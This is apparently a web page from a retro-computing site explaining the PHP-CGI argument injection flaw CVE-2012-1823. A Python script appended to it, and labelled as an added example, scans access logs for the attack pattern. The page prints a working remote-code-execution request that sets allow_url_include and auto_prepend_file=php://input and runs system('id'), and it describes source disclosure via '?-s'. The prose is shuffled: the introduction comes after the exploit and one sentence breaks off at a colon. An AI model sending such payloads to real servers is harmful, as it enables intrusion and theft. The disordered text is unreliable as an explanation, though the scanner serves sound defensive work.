Welcome to Win3x.Org. You will find here what you need to reuse your old computer!  

PHP 5.3.10 Exploit Guide

This post is written from a security researcher / educational perspective. It explains the "CGI Argument Injection" vulnerability (CVE-2012-1823), which is the most critical exploit associated with this specific version.

Title: Revisiting the Ghost of PHP 5.3.10: The CGI Argument Injection Exploit (CVE-2012-1823)

POST /?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

<?php system('id'); ?>

/usr/bin/php-cgi /path/to/index.php

The bug occurred in how PHP parsed the query string. If an attacker sent a request without a script name (e.g., http://target.com/?-s), the PHP engine would misinterpret the query string.

The attacker sees the raw PHP source code of the application, including database passwords and API keys.

The Grand Prize: Arbitrary Code Execution (-d and -B)

Seeing source code is bad, but executing code is worse. The -d flag allows you to set php.ini directives on the fly. Combined with -B (Run code before processing input), we get RCE.

However, the RCE payload is specific. Spaces are not allowed in URLs, so they must be replaced with + or %20.

Disclaimer: This post is for educational purposes and authorized security testing only. Exploiting systems you do not own is illegal.

When PHP is run in CGI mode (using php-cgi), the web server passes request data to the PHP binary via command-line arguments. Normally, a request to index.php translates to:

Released in early 2012, PHP 5.3.10 was intended to be a security fix for a previous bug. Ironically, it shipped with a massive, easily exploitable vulnerability that allowed attackers to execute arbitrary code on millions of servers.
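
A defender-side check for the request pattern described in this post, as an added example that is not part of the original post: it scans access-log lines for query strings that a CGI server would hand to php-cgi as command-line switches, including the + / %20 and %3d encodings mentioned above. The log lines and the names cgi_switches and scan are constructed for illustration; the rule that only a query without an unencoded = is passed as arguments is taken from the CGI specification (RFC 3875), not from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?id=42&sort=-date HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2025:10:00:01 +0000] "GET /?-s HTTP/1.1" 200 9120',
    '203.0.113.9 - - [01/Jan/2025:10:00:02 +0000] "POST /?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 31',
    '203.0.113.7 - - [01/Jan/2025:10:00:03 +0000] "GET /search.php?q=-s HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2025:10:00:04 +0000] "GET /index.php?%2Ds HTTP/1.1" 200 9120',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def cgi_switches(target):
    """Return the decoded argument list if the query would reach php-cgi
    as command-line switches, otherwise an empty list."""
    _, sep, query = target.partition("?")
    # Assumption (RFC 3875): a query containing an unencoded "=" is an
    # ordinary form query and is not turned into command-line arguments.
    if not sep or not query or "=" in query:
        return []
    # "+" and %20 both decode to the space that separates arguments;
    # %2D decodes to "-", so an encoded hyphen is caught as well.
    args = unquote(query.replace("+", " ")).split()
    return args if any(a.startswith("-") for a in args) else []


def scan(lines):
    """Return (client_ip, method, args) for every suspicious request line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        args = cgi_switches(m.group("target"))
        if args:
            hits.append((line.split()[0], m.group("method"), args))
    return hits


if __name__ == "__main__":
    for ip, method, args in scan(SAMPLE_LOG):
        print(ip, method, args)
```

Ordinary parameters such as sort=-date or q=-s are not flagged, because the unencoded = keeps them out of the argument list.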
